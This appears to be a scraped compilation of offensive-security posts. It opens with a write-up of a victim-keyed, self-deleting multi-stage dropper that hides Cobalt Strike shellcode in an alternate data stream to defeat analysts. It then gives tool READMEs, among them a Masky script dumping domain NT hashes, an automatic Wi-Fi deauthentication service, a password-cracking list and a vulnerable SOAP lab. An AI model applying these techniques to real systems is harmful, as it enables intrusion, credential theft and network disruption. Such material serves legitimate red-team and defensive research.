About 6 months ago it occured to me that while I had learned and done a lot with malware concerning AV/EDR evasion, I had spent very little time concerned with trying to evade or defeat reverse engineering/malware analysis. This was for a few good reasons:

  1. I don't know anything about malware analysis or reverse engineering
  2. When you are talking about legal, sanctioned Red Team work there isn't really a need to try and frustrate or defeat a reverse engineer because the activity should have been deconflicted long before it reaches that stage.

Nonetheless it was an interesting thought experiment and I had a few colleagues who DO know about malware analysis that I could bounce ideas off of. It seemed a challenge of a whole different magnitude compared to AV/EDR evasion and one I decided to take a stab at.

Premise

My initial premise was that the malware, on the first time of being ran, would somehow "key" itself to that victim machine; any subsequent attempts to run it would evaluate something in the target environment and compare it for a match in the malware. If those two factors matched, it executes as expected. If they do not (as in the case where the sample had been transfered to a malware analysts sandbox), the malware deletes itself (Once again heavily leaning on the work of LloydLabs and his delete-self-poc).

This "key" must be something "unique" to the victim computer. Ideally it will be a combination of several pieces of information, and then further obfuscated. As an example, we could gather the hostname of the computer as well as the amount of RAM installed; these two values can then be concatenated (e.g. Client018192MB) and then hashed using a user-defined function to produce a number (e.g. 5343823956).

There are a ton of choices in what information to gather, but thought should be given as to what values a Blue Teamer could easily spoof; a MAC address for example may seem like an attractive "unique" identifier for a victim, however MAC addresses can easily be set manually in order for a Reverse Engineer to match their sandbox to the original victim. Ideally the values chosen and enumerated will be one that are difficult for a reverse engineer to replicate in their environment.

With some self-deletion magic, the malware could read itself into a buffer, locate a placeholder variable and replace it with this number, delete itself, and then write the modified malware back to disk in the same location. Combined with an if/else statement in Main, the next time the malware runs it will detect that it has been ran previously and then go gather the hostname and amount of RAM again in order to produce the hashed number. This would then be evaluated against the number stored in the malware during the first run (5343823956). If it matches (as is the case if the malware is running on the same machine as it originally did), it executes as expected however if a different value is returned it will again call the self-delete function in order to remove itself from disk and protect the author from the malware analyst.

This seemed like a fine idea in theory until I spoke with a colleague who has real malware analysis and reverse engineering experience. I was told that a reverse engineer would be able to observe the conditional statement in the malware (if ValueFromFirstRun != GetHostnameAndRAM()), and seeing as the expected value is hard-coded on one side of the conditional statement, simply modify the registers to contain the expected value thus completely bypassing the entire protection mechanism.

This new knowledge completely derailed the thought experiment and seeing as I didn't really have a use for a capability like this in the first place, this is where the project stopped for ~6 months.

Overview

This project resurfaced a few times over the intervening 6 months but each time was little more than a passing thought, as I had gained no new knowledge of reversing/malware analysis and again had no need for such a capability. A few days ago the idea rose again and while still neither of those factors have really changed, I guess I had a little bit more knowledge under my belt and couldn't let go of the idea this time.

With the aforementioned problem regarding hard-coding values in mind, I ultimately decided to go for a multi-stage design. I will refer to them as Stage0, Stage1, and Stage2.

Stage0: Setup. Ran on initial infection and deleted afterwards

Stage1: Runner. Ran each subsequent time the malware executes

Stage2: Payload. The malware you care about protecting. Spawns a process and injects shellcode in order to return a Beacon.

Lifecycle

Stage0

Stage0 is the fresh executable delivered to target by the attacker. It contains Stage1 and Stage2 as AES encrypted byte arrays; this is done to protect the malware in transit, or should a defender somehow get their hands on a copy of Stage0 (which shouldn't happen). The AES Key and IV are contained within Stage0 so in reality this won't protect Stage1 or Stage2 from a competent Blue Teamer.

Stage0 performs the following actions:

  1. Sandbox evasion.
  2. Delete itself from disk. It is still running in memory.
  3. Decrypts Stage1 using stored AES Key/IV and writes to disk in place of Stage0.
  4. Gathers the processor name and the Microsoft ProductID.
  5. Hashes this value and then pads it to fit a 16 byte AES key length. This value reversed serves as the AES IV.
  6. Decrypts Stage2 using stored AES Key/IV.
  7. Encrypts Stage2 using new victim-specific AES Key/IV.
  8. Writes Stage2 to disk as an alternate data stream of Stage1.

At the conclusion of this sequence of events, Stage0 exits. Because it was deleted from disk in step 2 and is no longer running in memory, Stage0 is effectively gone; Without prior knowledge of this technique the rest of the malware lifecycle will be a whole lot more confusing than it already is.

In step 4 the processor name and Microsoft ProductID are gathered; the ProductID is retreived from the Registry, and this value can be manually modified which presents and easy opportunity for a Blue Teamer to match their sandbox to the target environment. Depending on what environmental information is gathered this can become easier or more difficult.

Stage1

Stage1 was dropped by Stage0 and exists in the same exact location as Stage0 did (to include the name). Stage2 is stored as an ADS of Stage1. When the attacker/persistence subsequently executes the malware, they are executing Stage1.

Stage1 performs the following actions:

  1. Sandbox evasion.
  2. Gathers the processor name and the Microsoft ProductID.
  3. Hashes this value and then pads it to fit a 16 byte AES key length. This value reversed serves as the AES IV.
  4. Reads Stage2 from Stage1's ADS into memory.
  5. Decrypts Stage2 using the victim-specific AES Key/IV.
  6. Checks first two bytes of decryted Stage2 buffer; if not MZ (unsuccessful decryption), delete Stage1/Stage2, exit.
  7. Writes decrypted Stage2 back to disk as ADS of Stage1
  8. Calls CreateProcess on Stage2. If this fails (unsuccessful decryption), delete Stage1/Stage2, exit.
  9. Sleeps 5 seconds to allow Stage2 to execute + exit so it can be overwritten.
  10. Encrypts Stage2 using victim-specific AES Key/IV
  11. Writes encrypted Stage2 back to disk as ADS of Stage1.

Note that Stage2 MUST exit in order for it to be overwritten; the self-deletion trick does not appear to work on files that are already ADS's, as the self-deletion technique relies on renaming the primary data stream of the executable. Stage2 will ideally be an inject or spawn+inject executable.

There are two points that Stage1 could detect that it is not being ran from the same victim and delete itself/Stage2 in order to protect the threat actor. The first is the check for the executable header after decrypting Stage2 using the gathered environmental information; in theory this step could be bypassed by a reverse engineer, but it is a first good check. The second protection point is the result of the CreateProcess call- if it fails because Stage2 was not properly decrypted, the malware is similiary deleted. The result of this call could also be modified to prevent deletion by the reverse engineer, however this doesn't change the fact that Stage2 is encrypted and inaccessible.

Stage2

Stage2 is the meat and potatoes of the malware chain; It is a fully fledged shellcode runner/piece of malware itself. By encrypting and protecting it in the way that we have, the actions of the end state malware are much better obfuscated and protected from reverse engineers and malware analysts. During development I used one of my existing shellcode runners containing CobaltStrike shellcode, but this could be anything the attacker wants to run and protect.

Impact, Mitigation, and Further Work

So what is actually accomplished with a malware lifecycle like this? There are a few interesting quirks to talk about.

Alternate data streams are a feature unique to NTFS file systems; this means that most ways of transfering the malware after initial infection will strip and lose Stage2 because it is an ADS of Stage1. Special care would have to be given in order to transfer the sample in order to preserve Stage2, as without it a lot of reverse engineers and malware analysts are going to be very confused as to what is happening. RAR archives are able to preserve ADS's and tools like 7Z and Peazip can extract files and their ADS's.

As previously mentioned, by the time malware using this lifecycle hits a Blue Teamer it should be at Stage1; Stage0 has come and gone, and Stage2 is already encrypted with the environmental information gathered by stage 0. Not knowing that Stage0 even existed will add considerable uncertainty to understanding the lifecycle and decrypting Stage2.

In theory (because again I have no reversing experience), Stage1 should be able to be reversed (after the Blue Teamers rolls through a few copies of it because it keeps deleting itself) and the information that Stage1 gathers from the target system should be able to be identified. Provided a well-orchestrated response, Blue Team should be able to identify the victim that the malware came from and go and gather that information from it and feed it into the program so that it may be transformed appropriately into the AES Key/IV that decrypts Stage2. There are a lot "ifs" in there however related to the relative skill of the reverse engineer as well as the victim machine being available for that information to be recovered.

Application Whitelisting would significantly frustrate this lifecycle. Stage0/Stage1 may be able to be side loaded as a DLL, however I suspect that Stage2 as an ADS would present some issues. I do not have an environment to test malware against AWL nor have I bothered porting this all to DLL format so I cannot say. I am sure there are creative ways around these issues.

I am also fairly confident that there are smarter ways to run Stage2 than dropping to disk and calling CreateProcess; Either manually mapping the executable or using a tool like Donut to turn it into shellcode seem like reasonable ideas.

Code and binary

During development I created a Builder application that Stage1 and Stage2 may be fed to in order to produce a functional Stage0; this will not be provided however I will be providing most of the source code for stage1 as it is the piece that would be most visible to a Blue Teamer. Stage0 will be excluded as an exercise for the reader, and stage2 is whatever standalone executable you want to run+protect. This POC may be further researched at the effort and discretion of able readers.

I will be providing a compiled copy of this malware as Dropper64.exe. Dropper64.exe is compiled for x64. Dropper64.exe is Stage0; it contains Stage1 and Stage2. On execution, Stage1 and Stage2 will drop to disk but will NOT automatically execute, you must run Dropper64.exe(now Stage1) again. Stage2 is an x64 version of calc.exe. I am including this for any Blue Teamers who want to take a look at this, but keep in mind in an incident response scenario 99& of the time you will be getting Stage1/Stage2, Stage0 will be gone.

Conclusion

This was an interesting pet project that ate up a long weekend. I'm sure it would be a lot more advanced/more complete if I had experience in a debugger and disassembler, but you do the best with what you have. I am eager to hear from Blue Teamers and other Malware Devs what they think. I am sure I have over-complicatedly re-invented the wheel here given what actual APT's are doing, but I learned a few things along the way. Thank you for reading!



ApacheTomcatScanner - A Python Script To Scan For Apache Tomcat Server Vulnerabilities


A python script to scan for Apache Tomcat server vulnerabilities.


Features

  • Multithreaded workers to search for Apache tomcat servers.
  • Multiple target source possible:
    • Retrieving list of computers from a Windows domain through an LDAP query to use them as a list of targets.
    • Reading targets line by line from a file.
    • Reading individual targets (IP/DNS/CIDR) from -tt/--target option.
  • Custom list of ports to test.
  • Tests for /manager/html access and default credentials.
  • List the CVEs of each version with the --list-cves option

Installation

You can now install it from pypi with this command:

sudo python3 -m pip install apachetomcatscanner

Usage

$ ./ApacheTomcatScanner.py -h
Apache Tomcat Scanner v2.3.2 - by @podalirius_

usage: ApacheTomcatScanner.py [-h] [-v] [--debug] [-C] [-T THREADS] [-s] [--only-http] [--only-https] [--no-check-certificate] [--xlsx XLSX] [--json JSON] [-PI PROXY_IP] [-PP PROXY_PORT] [-rt REQUEST_TIMEOUT] [-tf TARGETS_FILE]
[-tt TARGET] [-tp TARGET_PORTS] [-ad AUTH_DOMAIN] [-ai AUTH_DC_IP] [-au AUTH_USER] [-ap AUTH_PASSWORD] [-ah AUTH_HASH]

A python script to scan for Apache Tomcat server vulnerabilities.

optional arguments:
-h, --help show this help message and exit
-v, --verbose Verbose mode. (default: False)
--debug Debug mode, for huge verbosity. (default: False)
-C, --list-cves List CVE ids affecting each version found. (default: False)
-T THREADS, --threads THREADS
Number of threads (default: 5)
-s, --servers-only If querying ActiveDirectory, only get servers and not all computer objects. (default: False)
--only-http Scan only with HTTP scheme. (default: False, scanning with both HTTP and HTTPs)
--only-https Scan only with HTTPs scheme. (default: False, scanning with both HTTP and HTTPs)
--no-check-certificate
Do not check certificate. (default: False)
--xlsx XLSX Export results to XLSX
--json JSON Export results to JSON

-PI PROXY_IP, --proxy-ip PROXY_IP
Proxy IP.
-PP PROXY_PORT, --proxy-port PROXY_PORT
Proxy port
-rt REQUEST_TIMEOUT, --request-timeout REQUEST_TIMEOUT

-tf TARGETS_FILE, --targets-file TARGETS_FILE
Path to file containing a line by line list of targets.
-tt TARGET, --target TARGET
Target IP, FQDN or CIDR
-tp TARGET_PORTS, --target-ports TARGET_PORTS
Target ports to scan top search for Apache Tomcat servers.
-ad AUTH_DOMAIN, --auth-domain AUTH_DOMAIN
Windows domain to authenticate to.
-ai AUTH_DC_IP, --auth-dc-ip AUTH_DC_IP
IP of the domain controller.
-au AUTH_USER, --auth-user AUTH_USER
Username of the domain account.
-ap AUTH_PASSWORD, --auth-password AUTH_PASSWORD
Password of the domain account.
-ah AUTH_HASH, --auth-hash AUTH_HASH
LM:NT hashes to pass the hash for this user.

Example


 

You can also list the CVEs of each version with the --list-cves option:



Contributing

Pull requests are welcome. Feel free to open an issue if you want to add other features.



Aced - Tool to parse and resolve a single targeted Active Directory principal's DACL


Aced is a tool to parse and resolve a single targeted Active Directory principal's DACL. Aced will identify interesting inbound access allowed privileges against the targeted account, resolve the SIDS of the inbound permissions, and present that data to the operator. Additionally, the logging features of pyldapsearch have been integrated with Aced to log the targeted principal's LDAP attributes locally which can then be parsed by pyldapsearch's companion tool BOFHound to ingest the collected data into BloodHound.


Use case?

I wrote Aced simply because I wanted a more targeted approach to query ACLs. Bloodhound is fantastic, however, it is extremely noisy. Bloodhound collects all the things while Aced collects a single thing providing the operator more control over how and what data is collected. There's a phrase the Navy Seals use: "slow is smooth and smooth is fast" and that's the approach I tried to take with Aced. The case for detection is reduced by only querying for what LDAP wants to tell you and by not performing an action known as "expensive ldap queries". Aced has the option to forego SMB connections for hostname resolution. You have the option to prefer LDAPS over LDAP. With the additional integration with BloodHound, the collected data can be stored in a familiar format that can be shared with a team. Privilege escalation attack paths can be built by walking backwards from the targeted goal.

References

Thanks to the below for all the code I stole:
@_dirkjan
@fortaliceLLC
@eloygpz
@coffeegist
@tw1sm

Usage

└─# python3 aced.py -h                             


_____
|A . | _____
| /.\ ||A ^ | _____
|(_._)|| / \ ||A _ | _____
| | || \ / || ( ) ||A_ _ |
|____V|| . ||(_'_)||( v )|
|____V|| | || \ / |
|____V|| . |
|____V|
v1.0

Parse and log a target principal's DACL.
@garrfoster

usage: aced.py [-h] [-ldaps] [-dc-ip DC_IP] [-k] [-no-pass] [-hashes LMHASH:NTHASH] [-aes hex key] [-debug] [-no-smb] target

Tool to enumerate a single target's DACL in Active Directory

optional arguments:
-h, --help show this help message and exit

Authentication:
target [[domain/username[:password]@]<address>
-ldaps Use LDAPS isntead of LDAP

Optional Flags:
-dc-ip DC_IP IP address or FQDN of domain controller
-k, --kerberos Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid
credentials cannot be found, it will use the ones specified in the command line
-no-pass don't ask for password (useful for -k)
-hashes LMHASH:NTHASH
LM and NT hashes, format is LMHASH:NTHASH
-aes hex key AES key to use for Kerberos Authentication (128 or 256 bits)
-debug Enable verbose logging.
-no-smb Do not resolve DC hostname through SMB. Requires a FQDN with -dc-ip.

Demo

In the below demo, we have the credentials for the corp.local\lowpriv account. By starting enumeration at Domain Admins, a potential path for privilege escalation is identified by walking backwards from the high value target.


And here's how that data looks when transformed by bofhound and ingested into BloodHound.




Autodeauth - A Tool Built To Automatically Deauth Local Networks


A tool built to automatically deauth local networks

Setup

$ chmod +x setup.sh
$ sudo ./setup.sh
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
Please enter your WiFi interface name e.g: wlan0 -> wlan1
autodeauth installed

use sudo autodeauth or systemctl start autodeauth

to edit service setting please edit: service file: /etc/systemd/system/autodeauth.service

Options

$ sudo autodeauth -h
_ _ ___ _ _
/_\ _ _| |_ ___| \ ___ __ _ _ _| |_| |_
/ _ \ || | _/ _ \ |) / -_) _` | || | _| ' \
/_/ \_\_,_|\__\___/___/\___\__,_|\_,_|\__|_||_|

usage: autodeauth [-h] --interface INTERFACE [--blacklist BLACKLIST] [--whitelist WHITELIST] [--led LED] [--time TIME] [--random] [--ignore] [--count COUNT] [--verbose VERBOSE]

Auto Deauth Tool

options:
-h, --help show this help message and exit
--interface INTERFACE, -i INTERFACE
Interface to fetch WiFi networks and send deauth packets (must support packet injection)
--blacklist BLACKLIST, -b BLACKLIST
List of networks ssids/mac addre sses to avoid (Comma seperated)
--whitelist WHITELIST, -w WHITELIST
List of networks ssids/mac addresses to target (Comma seperated)
--led LED, -l LED Led pin number for led display
--time TIME, -t TIME Time (in s) between two deauth packets (default 0)
--random, -r Randomize your MAC address before deauthing each network
--ignore Ignore errors encountered when randomizing your MAC address
--count COUNT, -c COUNT
Number of packets to send (default 5000)
--verbose VERBOSE, -v VERBOSE
Scapy verbosity setting (default: 0)

Usage

After running the setup you are able to run the script by using autodeauth from any directory

Command line

Networks with spaces can be represented using their mac addresses

$ sudo autodeauth -i wlan0 --blacklist FreeWiFi,E1:DB:12:2F:C1:57 -c 10000

Service

$ sudo systemctl start autodeauth

Loot and Log files

Loot

When a network is detected and fits under the whitelist/blacklist criteria its network information is saved as a json file in /var/log/autodeauth/

{
"ssid": "MyWiFiNetwork",
"mac_address": "10:0B:21:2E:C1:11",
"channel": 1,
"network.frequency": "2.412 GHz",
"mode": "Master",
"bitrates": [
"6 Mb/s",
"9 Mb/s",
"12 Mb/s",
"18 Mb/s",
"24 Mb/s",
"36 Mb/s",
"48 Mb/s",
"54 Mb/s"
],
"encryption_type": "wpa2",
"encrypted": true,
"quality": "70/70",
"signal": -35
}

Log File

$ cat /var/log/autodeauth/log               
2022-08-20 21:01:31 - Scanning for local networks
2022-08-20 21:20:29 - Sending 5000 deauth frames to network: A0:63:91:D5:B8:76 -- MyWiFiNetwork
2022-08-20 21:21:00 - Exiting/Cleaning up

Edit Service Config

To change the settings of the autodeauth service edit the file /etc/systemd/system/autodeauth.service
Lets say you wanted the following config to be setup as a service

$ sudo autodeauth -i wlan0 --blacklist FreeWiFi,myWifi -c 10000
$ vim /etc/systemd/system/autodeauth.service

Then you would change the ExecStart line to

ExecStart=/usr/bin/python3 /usr/local/bin/autodeauth -i wlan0 --blacklist FreeWiFi,myWifi -c 10000


Awesome-Password-Cracking - A Curated List Of Awesome Tools, Research, Papers And Other Projects Related To Password Cracking And Password Security


A curated list of awesome tools, research, papers and other projects related to password cracking and password security.

Read the guidelines before contributing! In short:


Books

Cloud

  • Cloud_crack - Crack passwords using Terraform and AWS.
  • Cloudcat - A script to automate the creation of cloud infrastructure for hash cracking.
  • Cloudstomp - Automated deployment of instances on EC2 via plugin for high CPU/GPU applications at the lowest price.
  • Cloudtopolis - A tool that facilitates the installation and provisioning of Hashtopolis on the Google Cloud Shell platform, quickly and completely unattended (and also, free!).
  • NPK - NPK is a distributed hash-cracking platform built entirely of serverless components in AWS including Cognito, DynamoDB, and S3.
  • Penglab - Abuse of Google Colab for cracking hashes.
  • Rook - Automates the creation of AWS p3 instances for use in GPU-based password cracking.

Conversion

  • 7z2hashcat - Extract information from password-protected .7z archives (and .sfx files) such that you can crack these "hashes" with hashcat.
  • MacinHash - Convert macOS plist password file to hash file for password crackers.
  • NetNTLM-Hashcat - Converts John The Ripper/Cain format hashes (singular, or in bulk) to HashCat compatible hash format.
  • Rubeus-to-Hashcat - Converts / formats Rubeus kerberoasting output into hashcat readable format.
  • WINHELLO2hashcat - With this tool one can extract the "hash" from a WINDOWS HELLO PIN. This hash can be cracked with Hashcat.
  • bitwarden2hashcat - A tool that converts Bitwarden's data into a hashcat-suitable hash.
  • hc_to_7z - Convert 7-Zip hashcat hashes back to 7z archives.
  • hcxtools - Portable solution for conversion of cap/pcap/pcapng (gz compressed) WiFi dump files to hashcat formats.
  • itunes_backup2hashcat - Extract the information needed from the Manifest.plist files to convert it to hashes compatible with hashcat.
  • mongodb2hashcat - Extract hashes from the MongoDB database server to a hash format that hashcat accepts: -m 24100 (SCRAM-SHA-1) or -m 24200 (SCRAM-SHA-256).

Hashcat

Hashcat is the "World's fastest and most advanced password recovery utility." The following are projects directly related to Hashcat in one way or another.

  • Autocrack - A set of client and server tools for automatically, and lightly automatically cracking hashes.
  • docker-hashcat - Latest hashcat docker for Ubuntu 18.04 CUDA, OpenCL, and POCL.
  • Hashcat-Stuffs - Collection of hashcat lists and things.
  • hashcat-utils - Small utilities that are useful in advanced password cracking.
  • Hashfilter - Read a hashcat potfile and parse different types into a sqlite database.
  • known_hosts-hashcat - A guide and tool for cracking ssh known_hosts files with hashcat.
  • pyhashcat - Python C API binding to libhashcat.

Automation

  • autocrack - Hashcat wrapper to help automate the cracking process.
  • hashcat.launcher - A cross-platform app that run and control hashcat.
  • hat - An Automated Hashcat Tool for common wordlists and rules to speed up the process of cracking hashes during engagements.
  • hate_crack - A tool for automating cracking methodologies through Hashcat from the TrustedSec team.
  • Naive hashcat - Naive hashcat is a plug-and-play script that is pre-configured with naive, emperically-tested, "good enough" parameters/attack types.

Distributed cracking

  • CrackLord - Queue and resource system for cracking passwords.
  • fitcrack - A hashcat-based distributed password cracking system.
  • Hashtopolis - A multi-platform client-server tool for distributing hashcat tasks to multiple computers.
  • Kraken - A multi-platform distributed brute-force password cracking system.

Rules

  • clem9669 rules - Rule for hashcat or john.
  • hashcat rules collection - Probably the largest collection of hashcat rules out there.
  • Hob0Rules - Password cracking rules for Hashcat based on statistics and industry patterns.
  • Kaonashi - Wordlist, rules and masks from Kaonashi project (RootedCON 2019).
  • nsa-rules - Password cracking rules and masks for hashcat generated from cracked passwords.
  • nyxgeek-rules - Custom password cracking rules for Hashcat and John the Ripper.
  • OneRuleToRuleThemAll - "One rule to crack all passwords. or atleast we hope so."
  • pantagrule - Large hashcat rulesets generated from real-world compromised passwords.

Rule tools

  • duprule - Detect & filter duplicate hashcat rules.

Web interfaces

  • crackerjack - CrackerJack is a Web GUI for Hashcat developed in Python.
  • CrackQ - A Python Hashcat cracking queue system.
  • hashpass - Hash cracking WebApp & Server for hashcat.
  • Hashview - A web front-end for password cracking and analytics.
  • Wavecrack - Wavestone's web interface for password cracking with hashcat.
  • WebHashCat - WebHashcat is a very simple but efficient web interface for hashcat password cracking tool.

John the Ripper

John the Ripper is "an Open Source password security auditing and password recovery tool available for many operating systems." The following are projects directly related to John the Ripper in one way or another.

  • BitCracker - BitCracker is the first open source password cracking tool for memory units encrypted with BitLocker.
  • johnny - GUI frontend to John the Ripper.

Misc

  • hashID - Software to identify the different types of hashes.
  • Name That Hash - Don't know what type of hash it is? Name That Hash will name that hash type! Identify MD5, SHA256 and 300+ other hashes. Comes with a neat web app.

Websites

Communities

  • hashcat Forum - Forum by the developers of hashcat.
  • Hashmob - A growing password recovery community aimed towards being a center point of collaboration for cryptography enthusiasts.
  • Hashkiller Forum - A password cracking forum with over 20,000 registered users.

Lookup services

  • CMD5 - Provides online MD5 / sha1/ mysql / sha256 encryption and decryption services.
  • CrackStation - Free hash lookup service supplying wordlists as well.
  • Hashes.com - A hash lookup service with paid features.
  • Hashkiller - A hash lookup service with a forum.
  • Online Hash Crack - Cloud password recovery service.

Wordlist tools

Tools for analyzing, generating and manipulating wordlists.

Analysis

  • PACK - A collection of utilities developed to aid in analysis of password lists in order to enhance password cracking through pattern detection of masks, rules, character-sets and other password characteristics.
  • pcfg_cracker - This project uses machine learning to identify password creation habits of users.
  • Pipal - THE password analyser.

Generation/Manipulation

  • common-substr - Simple tool to extract the most common substrings from an input text. Built for password cracking.
  • Crunch - Crunch is a wordlist generator where you can specify a standard character set or a character set you specify. Crunch can generate all possible combinations and permutations.
  • CUPP - A tool that lets you generate wordlists by user profiling data such as birthday, nickname, address, name of a pet or relative etc.
  • duplicut - Remove duplicates from MASSIVE wordlist, without sorting it (for dictionary-based password cracking).
  • Gorilla - Tool for generating wordlists or extending an existing one using mutations.
  • Keyboard-Walk-Generators - Generate Keyboard Walk Dictionaries for cracking.
  • kwprocessor - Advanced keyboard-walk generator with configureable basechars, keymap and routes.
  • maskprocessor - High-performance word generator with a per-position configureable charset.
  • maskuni - A standalone fast word generator in the spirit of hashcat's mask generator with unicode support.
  • Mentalist - Mentalist is a graphical tool for custom wordlist generation. It utilizes common human paradigms for constructing passwords and can output the full wordlist as well as rules compatible with Hashcat and John the Ripper.
  • Phraser - Phraser is a phrase generator using n-grams and Markov chains to generate phrases for passphrase cracking.
  • princeprocessor - Standalone password candidate generator using the PRINCE algorithm.
  • Rephraser - A Python-based reimagining of Phraser using Markov-chains for linguistically-correct password cracking.
  • Rling - RLI Next Gen (Rling), a faster multi-threaded, feature rich alternative to rli found in hashcat utilities.
  • statsprocessor - Word generator based on per-position markov-chains.
  • TTPassGen - Flexible and scriptable password dictionary generator which supportss brute-force, combination, complex rule modes etc.
  • token-reverser - Words list generator to crack security tokens.
  • WikiRaider - WikiRaider enables you to generate wordlists based on country specific databases of Wikipedia.

Wordlists

Laguage specific

  • Albanian wordlist - A mix of names, last names and some albanian literature.
  • Danish Phone Wordlist Generator - This tool can generate wordlists of Danish phone numbers by area and/or usage (Mobile, landline etc.) Useful for password cracking or fuzzing Danish targets.
  • Danish Wordlists - Collection of danish wordlists for cracking danish passwords.
  • French Wordlists - This project aim to provide french word list about everything a person could use as a base password.

Other

  • Packet Storm Wordlists - A substantial collection of different wordlists in multiple languages.
  • Rocktastic - Includes many permutations of passwords and patterns that have been observed in the wild.
  • RockYou2021 - RockYou2021.txt is a MASSIVE WORDLIST compiled of various other wordlists.
  • WeakPass - Collection of large wordlists.

Specific file formats

PDF

  • pdfrip - A multi-threaded PDF password cracking utility equipped with commonly encountered password format builders and dictionary attacks.

PEM

JKS

  • JKS private key cracker - Cracking passwords of private key entries in a JKS fileCracking passwords of private key entries in a JKS file.

ZIP

  • bkcrack - Crack legacy zip encryption with Biham and Kocher's known plaintext attack.
  • frackzip - Small tool for cracking encrypted ZIP archives.

Artificial Intelligence

  • adams - Reducing Bias in Modeling Real-world Password Strength via Deep Learning and Dynamic Dictionaries. - Code for cracking passwords with neural networks.
  • RNN-Passwords - Using the char-rnn to learn and guess passwords.
  • rulesfinder - This tool finds efficient password mangling rules (for John the Ripper or Hashcat) for a given dictionary and a list of passwords.

Research

Papers

Talks



Masky - Python Library With CLI Allowing To Remotely Dump Domain User Credentials Via An ADCS Without Dumping The LSASS Process Memory


Masky is a python library providing an alternative way to remotely dump domain users' credentials thanks to an ADCS. A command line tool has been built on top of this library in order to easily gather PFX, NT hashes and TGT on a larger scope.

This tool does not exploit any new vulnerability and does not work by dumping the LSASS process memory. Indeed, it only takes advantage of legitimate Windows and Active Directory features (token impersonation, certificate authentication via kerberos & NT hashes retrieval via PKINIT). A blog post was published to detail the implemented technics and how Masky works.

Masky source code is largely based on the amazing Certify and Certipy tools. I really thanks their authors for the researches regarding offensive exploitation technics against ADCS (see. Acknowledgments section).


Installation

Masky python3 library and its associated CLI can be simply installed via the public PyPi repository as following:

pip install masky

The Masky agent executable is already included within the PyPi package.

Moreover, if you need to modify the agent, the C# code can be recompiled via a Visual Studio project located in agent/Masky.sln. It would requires .NET Framework 4 to be built.

Usage

Masky has been designed as a Python library. Moreover, a command line interface was created on top of it to ease its usage during pentest or RedTeam activities.

For both usages, you need first to retrieve the FQDN of a CA server and its CA name deployed via an ADCS. This information can be easily retrieved via the certipy find option or via the Microsoft built-in certutil.exe tool. Make sure that the default User template is enabled on the targeted CA.

Warning: Masky deploys an executable on each target via a modification of the existing RasAuto service. Despite the automated roll-back of its intial ImagePath value, an unexpected error during Masky runtime could skip the cleanup phase. Therefore, do not forget to manually reset the original value in case of such unwanted stop.

Command line

The following demo shows a basic usage of Masky by targeting 4 remote systems. Its execution allows to collect NT hashes, CCACHE and PFX of 3 distincts domain users from the sec.lab testing domain.

Masky also provides options that are commonly provided by such tools (thread number, authentication mode, targets loaded from files, etc. ).

  __  __           _
| \/ | __ _ ___| | ___ _
| |\/| |/ _` / __| |/ / | | |
| | | | (_| \__ \ <| |_| |
|_| |_|\__,_|___/_|\_\__, |
v0.0.3 |___/

usage: Masky [-h] [-v] [-ts] [-t THREADS] [-d DOMAIN] [-u USER] [-p PASSWORD] [-k] [-H HASHES] [-dc-ip ip address] -ca CERTIFICATE_AUTHORITY [-nh] [-nt] [-np] [-o OUTPUT]
[targets ...]

positional arguments:
targets Targets in CIDR, hostname and IP formats are accepted, from a file or not

options:
-h, --help show this help message and exit
-v, --verbose Enable debugging messages
-ts, --timestamps Display timestamps for each log
-t THREADS, --threads THREADS
Threadpool size (max 15)

Authentication:
-d DOMAIN, --domain DOMAIN
Domain name to authenticate to
-u USER, --user USER Username to au thenticate with
-p PASSWORD, --password PASSWORD
Password to authenticate with
-k, --kerberos Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters.
-H HASHES, --hashes HASHES
Hashes to authenticate with (LM:NT, :NT or :LM)

Connection:
-dc-ip ip address IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
-ca CERTIFICATE_AUTHORITY, --certificate-authority CERTIFICATE_AUTHORITY
Certificate Authority Name (SERVER\CA_NAME)

Results:
-nh, --no-hash Do not request NT hashes
-nt, --no-ccache Do not save ccache files
-np, --no-pfx Do not save pfx files
-o OUTPUT, --output OUTPUT
Local path to a folder where Masky results will be stored (automatically creates the folde r if it does not exit)

Python library

Below is a simple script using the Masky library to collect secrets of running domain user sessions from a remote target.

from masky import Masky
from getpass import getpass


def dump_nt_hashes():
# Define the authentication parameters
ca = "srv-01.sec.lab\sec-SRV-01-CA"
dc_ip = "192.168.23.148"
domain = "sec.lab"
user = "askywalker"
password = getpass()

# Create a Masky instance with these credentials
m = Masky(ca=ca, user=user, dc_ip=dc_ip, domain=domain, password=password)

# Set a target and run Masky against it
target = "192.168.23.130"
rslts = m.run(target)

# Check if Masky succesfully hijacked at least a user session
# or if an unexpected error occured
if not rslts:
return False

# Loop on MaskyResult object to display hijacked users and to retreive their NT hashes
print(f"Results from hostname: {rslts.hostname}")
for user in rslts.users:
print(f"\t - {user.domain}\{user.n ame} - {user.nt_hash}")

return True


if __name__ == "__main__":
dump_nt_hashes()

Its execution generate the following output.

$> python3 .\masky_demo.py
Password:
Results from hostname: SRV-01
- sec\hsolo - 05ff4b2d523bc5c21e195e9851e2b157
- sec\askywalker - 8928e0723012a8471c0084149c4e23b1
- sec\administrator - 4f1c6b554bb79e2ce91e012ffbe6988a

A MaskyResults object containing a list of User objects is returned after a successful execution of Masky.

Please look at the masky\lib\results.py module to check the methods and attributes provided by these two classes.

Acknowledgments



Erlik - Vulnerable Soap Service


Erlik - Vulnerable Soap Service

Tested - Kali 2022.1

Description

It is a vulnerable SOAP web service. It is a lab environment created for people who want to improve themselves in the field of web penetration testing.


Features

It contains the following vulnerabilities.

  • LFI
  • SQL Injection
  • Informaion Disclosure
  • Command Inejction
  • Brute Force
  • Deserialization

Installation

git clone https://github.com/anil-yelken/Vulnerable-Soap-Service

cd Vulnerable-Soap-Service

sudo pip3 install requirements.txt

Usage

sudo python3 vulnerable_soap.py

Exploiting Vulnerabilities

LFI

Code:https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/lfi.py

SQL Injection

Code:https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/sqli.py

Informaion Disclosure

Code:https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/get_logs_information_disclosure.py

Code:https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/get_data_information_disclosure.py

Command Injection

Code:https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/commandi.py

